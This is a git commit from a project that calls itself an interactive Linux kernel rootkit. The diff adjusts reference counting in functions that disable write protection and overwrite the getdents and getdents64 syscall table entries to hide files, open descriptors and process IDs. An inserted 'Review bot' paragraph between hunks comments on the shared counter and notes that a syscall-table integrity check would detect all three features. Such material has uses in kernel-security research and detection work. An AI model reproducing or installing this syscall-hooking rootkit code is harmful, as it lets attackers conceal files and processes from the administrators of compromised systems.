linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 8e8eda3ea1468380d2416ffd4a45e54554a0acdf
parent b473b83b5c4cf55cf529b0dba4c70da4f28318f3
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 14:37:06 +0100

fixes erroneous install count checking

Diffstat:
Msrc/filehide.c | 8++------
Msrc/openhide.c | 8++------
Msrc/pidhide.c | 8++------
3 files changed, 6 insertions(+), 18 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -14,9 +14,7 @@
 void
 hide_files(void)
 {
- if (atomic_inc_return(&getdents_install_count) >= 1) {
- atomic_set(&getdents_install_count, 1);
-
+ if (atomic_inc_return(&getdents_install_count) == 1) {
 disable_protection();
 sys_calls[__NR_getdents] = (void *)g7_getdents;
 sys_calls[__NR_getdents64] = (void *)g7_getdents64;
@@ -27,9 +25,7 @@ hide_files(void)
 void
 unhide_files(void)
 {
- if (atomic_dec_return(&getdents_install_count) < 0) {
- atomic_set(&getdents_install_count, 0);
-
+ if (atomic_dec_return(&getdents_install_count) < 1) {
 if (sys_getdents) {
 disable_protection();
 sys_calls[__NR_getdents] = (void *)sys_getdents;
diff --git a/src/openhide.c b/src/openhide.c
@@ -26,9 +26,7 @@ fd_list_t_ptr hidden_fds_tail = &hidden_fds;
 void
 hide_open(void)
 {
- if (atomic_inc_return(&getdents_install_count) >= 1) {
- atomic_set(&getdents_install_count, 1);
-
+ if (atomic_inc_return(&getdents_install_count) == 1) {
 disable_protection();
 sys_calls[__NR_getdents] = (void *)g7_getdents;
 sys_calls[__NR_getdents64] = (void *)g7_getdents64;
@@ -39,9 +37,7 @@ hide_open(void)
 void
 unhide_open(void)
 {
- if (atomic_dec_return(&getdents_install_count) < 0) {
- atomic_set(&getdents_install_count, 0);
-
+ if (atomic_dec_return(&getdents_install_count) < 1) {
 if (sys_getdents) {
 disable_protection();
 sys_calls[__NR_getdents] = (void *)sys_getdents;
diff --git a/src/pidhide.c b/src/pidhide.c
@@ -15,9 +15,7 @@ pid_list_t_ptr hidden_pids_tail = &hidden_pids;
 void
 hide_pids(void)
 {
- if (atomic_inc_return(&getdents_install_count) >= 1) {
- atomic_set(&getdents_install_count, 1);
-
+ if (atomic_inc_return(&getdents_install_count) == 1) {
 disable_protection();
 sys_calls[__NR_getdents] = (void *)g7_getdents;
 sys_calls[__NR_getdents64] = (void *)g7_getdents64;
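Review bot: `getdents_install_count` is shared by all three files touched here, yet none of the hunks (hide_files/unhide_files in src/filehide.c, hide_open/unhide_open in src/openhide.c, hide_pids/unhide_pids in src/pidhide.c) carries a comment stating the invariant the new comparisons rely on. A one-line comment above each `if`, such as `/* shared refcount: getdents/getdents64 slots are swapped on the 0 -> 1 transition and restored once the count drops below 1 */`, would make that explicit for anyone auditing the module. For analysts reading this commit, the consequence is that the `sys_calls[__NR_getdents]` and `sys_calls[__NR_getdents64]` slots stay redirected while any one of the three features is active, so a syscall-table integrity check on those two entries covers all of them. Each function body continues outside its hunk.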
@@ -28,9 +26,7 @@ hide_pids(void)
 void
 unhide_pids(void)
 {
- if (atomic_dec_return(&getdents_install_count) < 0) {
- atomic_set(&getdents_install_count, 0);
-
+ if (atomic_dec_return(&getdents_install_count) < 1) {
 if (sys_getdents) {
 disable_protection();
 sys_calls[__NR_getdents] = (void *)sys_getdents;